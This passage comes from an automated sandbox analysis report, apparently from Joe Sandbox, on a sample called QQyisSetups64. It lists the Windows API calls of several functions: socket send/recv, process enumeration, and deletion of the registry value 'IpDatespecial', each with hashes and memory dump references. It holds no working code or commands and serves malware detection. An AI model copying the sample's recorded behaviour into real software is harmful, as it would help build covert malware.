                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB01D672D816219BDB25BF749448BAEB362BF4076CF14C209D812672C0CB346651DFD6
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C848E1
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C848EC
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 02C848F9
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C84914
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C8491D
                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 02C8492E
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: GetCurrentThreadId.KERNEL32 ref: 02C83F65
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: send.WS2_32(?,02C97440,00000010,00000000), ref: 02C83FC6
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: SetEvent.KERNEL32(?), ref: 02C83FE9
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C83FF5
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: WSACloseEvent.WS2_32(?), ref: 02C84003
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: shutdown.WS2_32(?,00000001), ref: 02C8401B
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: closesocket.WS2_32(?), ref: 02C84025
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1019945655-0
                                                                                                                                                                                                                      • Opcode ID: 048c7800c8cc46a64c38a0c28f3c8d2bb222281da2317f8bdeb9be07061052a8
                                                                                                                                                                                                                      • Instruction ID: f02b230d9f2f7a33634ecbecb1214009bfa8a2996b6abbac208a3e4ac730a8f6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 048c7800c8cc46a64c38a0c28f3c8d2bb222281da2317f8bdeb9be07061052a8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53F036722046045BC624EB69DC84E4AF3E9EFC5760B154B09E26987694CA75EC01CBE0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 03789BD2
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(037AFB64,?,?,?,03789B7B), ref: 03789BE3
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(037AFB64,?,?,?,03789B7B), ref: 03789BF8
                                                                                                                                                                                                                      • GdiplusShutdown.GDIPLUS(00000000,?,?,?,03789B7B), ref: 03789C04
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(037AFB64,?,?,?,03789B7B), ref: 03789C15
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(037AFB64,?,?,?,03789B7B), ref: 03789C1C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4268643673-0
                                                                                                                                                                                                                      • Opcode ID: 1a517f2a7dae3cd8060a05d9f5fb03b1d3676f3caf86a6f90c50bc98fbb3eef3
                                                                                                                                                                                                                      • Instruction ID: 23a0979438dd197ab0dc9e8f581ddad0528979def5a8b1286000c419a54dc902
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a517f2a7dae3cd8060a05d9f5fb03b1d3676f3caf86a6f90c50bc98fbb3eef3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE011AB1A01B04EFC754EFBA9C94455BBF4FAC9215325C6AEE118CA246C376C403CF95
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 037848E1
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 037848EC
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000258), ref: 037848F9
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 03784914
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0378491D
                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 0378492E
                                                                                                                                                                                                                        • Part of subcall function 03783F60: GetCurrentThreadId.KERNEL32 ref: 03783F65
                                                                                                                                                                                                                        • Part of subcall function 03783F60: send.WS2_32(?,037A49C0,00000010,00000000), ref: 03783FC6
                                                                                                                                                                                                                        • Part of subcall function 03783F60: SetEvent.KERNEL32(?), ref: 03783FE9
                                                                                                                                                                                                                        • Part of subcall function 03783F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03783FF5
                                                                                                                                                                                                                        • Part of subcall function 03783F60: WSACloseEvent.WS2_32(?), ref: 03784003
                                                                                                                                                                                                                        • Part of subcall function 03783F60: shutdown.WS2_32(?,00000001), ref: 0378401B
                                                                                                                                                                                                                        • Part of subcall function 03783F60: closesocket.WS2_32(?), ref: 03784025
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1019945655-0
                                                                                                                                                                                                                      • Opcode ID: 8d60a59ba238719cdd65f4c139c814ee50d5409d8bf4fd28ddb41aa9d5f06715
                                                                                                                                                                                                                      • Instruction ID: e1ef279e5d2662cfce6ee3f16de06b7f94eebe89e2444d2fe20df5d8e9b7cccb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d60a59ba238719cdd65f4c139c814ee50d5409d8bf4fd28ddb41aa9d5f06715
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CF030763447055BC624FBADDC84D4AF3E9EFC9720B258B09E265872D4CA75E801CBA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03783311
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000258), ref: 0378331E
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 03783326
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03783332
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0378333A
                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C), ref: 0378334B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3137405945-0
                                                                                                                                                                                                                      • Opcode ID: dc18d3566e24cde115043f96ee590521b45e4cb7615e5a28ba1a6b5954708d87
                                                                                                                                                                                                                      • Instruction ID: 6708b8998761e465dcb3af7b79ed5e1883ec556028a6ed1fb9c7845587a7f06e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc18d3566e24cde115043f96ee590521b45e4cb7615e5a28ba1a6b5954708d87
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 37F082722047046BD610ABA9DC84D46F3E8AFC9334B218B09F221832D5CAB4E801CB60
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$_vswprintf_s
                                                                                                                                                                                                                      • String ID: D
                                                                                                                                                                                                                      • API String ID: 3424173483-2746444292
                                                                                                                                                                                                                      • Opcode ID: 2f372f8b193b55f381ae2940e49f38bf8b0d2135d2ee914d7ca5118c505ab299
                                                                                                                                                                                                                      • Instruction ID: 025f5983f1731cc6c3cd4b7c3e7767bed5427154a0b1c2e848f2fb33f1f08071
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f372f8b193b55f381ae2940e49f38bf8b0d2135d2ee914d7ca5118c505ab299
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A81B4719403187BE725DB658C8AFEB777CEF95701F500098F709A61C1DBB06B858B68
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ___BuildCatchObject.LIBCMT ref: 037A096E
                                                                                                                                                                                                                        • Part of subcall function 037A08C9: ___BuildCatchObjectHelper.LIBCMT ref: 037A08FF
                                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 037A0985
                                                                                                                                                                                                                      • ___FrameUnwindToState.LIBCMT ref: 037A0993
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                                      • API String ID: 2163707966-3733052814
                                                                                                                                                                                                                      • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                                                                                                                                      • Instruction ID: 58d32dd202cc358f94355fffb807ce421545725f687b458e06bd79026a61022b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E014675401A09BFEF12AF55CC48EAABF6AEF88350F048614FC0818120D736D9B1EBA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ___BuildCatchObject.LIBCMT ref: 02C93A63
                                                                                                                                                                                                                        • Part of subcall function 02C939BE: ___BuildCatchObjectHelper.LIBCMT ref: 02C939F4
                                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 02C93A7A
                                                                                                                                                                                                                      • ___FrameUnwindToState.LIBCMT ref: 02C93A88
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                                      • API String ID: 2163707966-3733052814
                                                                                                                                                                                                                      • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                                                                                                                      • Instruction ID: a710b76326aa2080a895a6dfec9dddad4f2ca550fbea03382f66afa275e5dd76
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3601F231441149BBDF12AFA1CC48EAB7FAAFF48354F008054FD5916120DB36DAB1EBA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 0378B800
                                                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 0378B810
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0378B81B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                      • String ID: Console$IpDatespecial
                                                                                                                                                                                                                      • API String ID: 849931509-1840232981
                                                                                                                                                                                                                      • Opcode ID: f9098454d53f1fb9159dffe004c7b2ed84798e01c3a08ff4ddd82b10d3a4302a
                                                                                                                                                                                                                      • Instruction ID: 97c7fefa31031b16ff81613b0ec9bcf855f9df3f34c5fe1547905de30d2c8831
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9098454d53f1fb9159dffe004c7b2ed84798e01c3a08ff4ddd82b10d3a4302a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DE08672345644AFD314A764AC4FF9BB754F7CC711F008A1DFA84A11428555E440E765
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,453DC9E3), ref: 0378B9DA
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378B9FB
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0378BA4B
                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0378BA65
                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0378BAB7
                                                                                                                                                                                                                        • Part of subcall function 0378F707: _malloc.LIBCMT ref: 0378F721
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2416807333-0
                                                                                                                                                                                                                      • Opcode ID: 5ddac39539a806a9a1dd268ed0628f26af67b41067b953204a71e2e8505834b7
                                                                                                                                                                                                                      • Instruction ID: 32ad71a3362fb57fe5cfcad6392fa238dd401cbee0f4c0ae8c9f76e19d4b9da9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ddac39539a806a9a1dd268ed0628f26af67b41067b953204a71e2e8505834b7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C412971980605DFEB10FF60CC89FEAB7B8EF44710F048299D9159B2C0E7759940CB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$_malloc_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2102557794-0
                                                                                                                                                                                                                      • Opcode ID: e53316d21375d094fd0d01ad1aa4a9b8896b5686d1183deebe2b3030ce136b07
                                                                                                                                                                                                                      • Instruction ID: 3196f62d766dc1c64797afd41a9597a333353e417036359686a8e62244e4f6c9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e53316d21375d094fd0d01ad1aa4a9b8896b5686d1183deebe2b3030ce136b07
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F731D2B26103156BE318DF29D981747B7D9BF44300F08853AD909CB792E7B1E460CB94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • recv.WS2_32(?,?,00000598,00000000), ref: 03783CBF
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,0378399F,?,?,00000000,000000FF,00000000), ref: 03783CFA
                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 03783D45
                                                                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,0378399F,?,?,00000000,000000FF,00000000), ref: 03783D7B
                                                                                                                                                                                                                      • WSASetLastError.WS2_32(0000000D,?,?,0378399F,?,?,00000000,000000FF,00000000), ref: 03783DA2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$recv
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 316788870-0
                                                                                                                                                                                                                      • Opcode ID: caee4a16645f4e7298ddd2b0e6a9b6fbb133871e0ccb5163950dc2a5ac276f73
                                                                                                                                                                                                                      • Instruction ID: 42d1e0d2dc900fd36d8469b2899491ef12c4076e6d852e4f9ef1c58c7779dbeb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: caee4a16645f4e7298ddd2b0e6a9b6fbb133871e0ccb5163950dc2a5ac276f73
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A631047E6442008FFB24FF6CD8C8B6977A8FB85724F040166ED05DB38AD775D8408A60
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • recv.WS2_32(?,?,00000598,00000000), ref: 02C83CBF
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,02C8399F,?,?,00000000,000000FF,00000000), ref: 02C83CFA
                                                                                                                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 02C83D45
                                                                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,02C8399F,?,?,00000000,000000FF,00000000), ref: 02C83D7B
                                                                                                                                                                                                                      • WSASetLastError.WS2_32(0000000D,?,?,02C8399F,?,?,00000000,000000FF,00000000), ref: 02C83DA2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$recv
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 316788870-0
                                                                                                                                                                                                                      • Opcode ID: eab49ec1abca4ddfd05981be808396bbceff9fbab7ef3c4076877acc5f78812c
                                                                                                                                                                                                                      • Instruction ID: 2da670a1c088051bbee64e46735816d6bf419ae482dea3f1bfd5c5d6904c678e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eab49ec1abca4ddfd05981be808396bbceff9fbab7ef3c4076877acc5f78812c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62314C726142409FEB14BF28D8C876537A9FB8472CF5092A7EE05CF285E771D880CB51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 03790EF9
                                                                                                                                                                                                                        • Part of subcall function 0378F673: __FF_MSGBANNER.LIBCMT ref: 0378F68C
                                                                                                                                                                                                                        • Part of subcall function 0378F673: __NMSG_WRITE.LIBCMT ref: 0378F693
                                                                                                                                                                                                                        • Part of subcall function 0378F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76), ref: 0378F6B8
                                                                                                                                                                                                                      • _free.LIBCMT ref: 03790F0C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1020059152-0
                                                                                                                                                                                                                      • Opcode ID: b0623035c4073877e587fb86006c77cfbc6b42e88159f500227cc1f94d770432
                                                                                                                                                                                                                      • Instruction ID: 6b059411c48d35766b0481fb5d309fec832aee4c4a277d6eff9323c0e6888336
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0623035c4073877e587fb86006c77cfbc6b42e88159f500227cc1f94d770432
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4911E336568F19EEEF21FF74B808A5A379B9F802A0B154627E8499B180DB3486819794
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 02C8E5E5
                                                                                                                                                                                                                        • Part of subcall function 02C86E83: __FF_MSGBANNER.LIBCMT ref: 02C86E9C
                                                                                                                                                                                                                        • Part of subcall function 02C86E83: __NMSG_WRITE.LIBCMT ref: 02C86EA3
                                                                                                                                                                                                                        • Part of subcall function 02C86E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C,02C8C15F), ref: 02C86EC8
                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C8E5F8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1020059152-0
                                                                                                                                                                                                                      • Opcode ID: a6660efef51672e5056541a75c7d0f58c90eba7f05f1117777f6cf5edfe33cde
                                                                                                                                                                                                                      • Instruction ID: e9d7d05e12f5cd4e8179b11c5426aac35fcbd96e5ed095706117f53b395e26c0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a6660efef51672e5056541a75c7d0f58c90eba7f05f1117777f6cf5edfe33cde
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C611EC32944519ABCB223F74AC0C75B37969F843ACB21C925F4489B141FF34CA509F94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 955811338-0
                                                                                                                                                                                                                      • Opcode ID: 716a177d22a8d8e036915ba2596b5d7cb69e67a12362207e119646dd6be4c177
                                                                                                                                                                                                                      • Instruction ID: 5e7aad1964e6b6d67033b8cd8a8ff42b59a428f02d253efd8f12c75491e0186d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 716a177d22a8d8e036915ba2596b5d7cb69e67a12362207e119646dd6be4c177
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E811CC3E10470AAFEB21BFE9DC40DAB77FAEF453747204529F919CA250DB71D4018AA2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
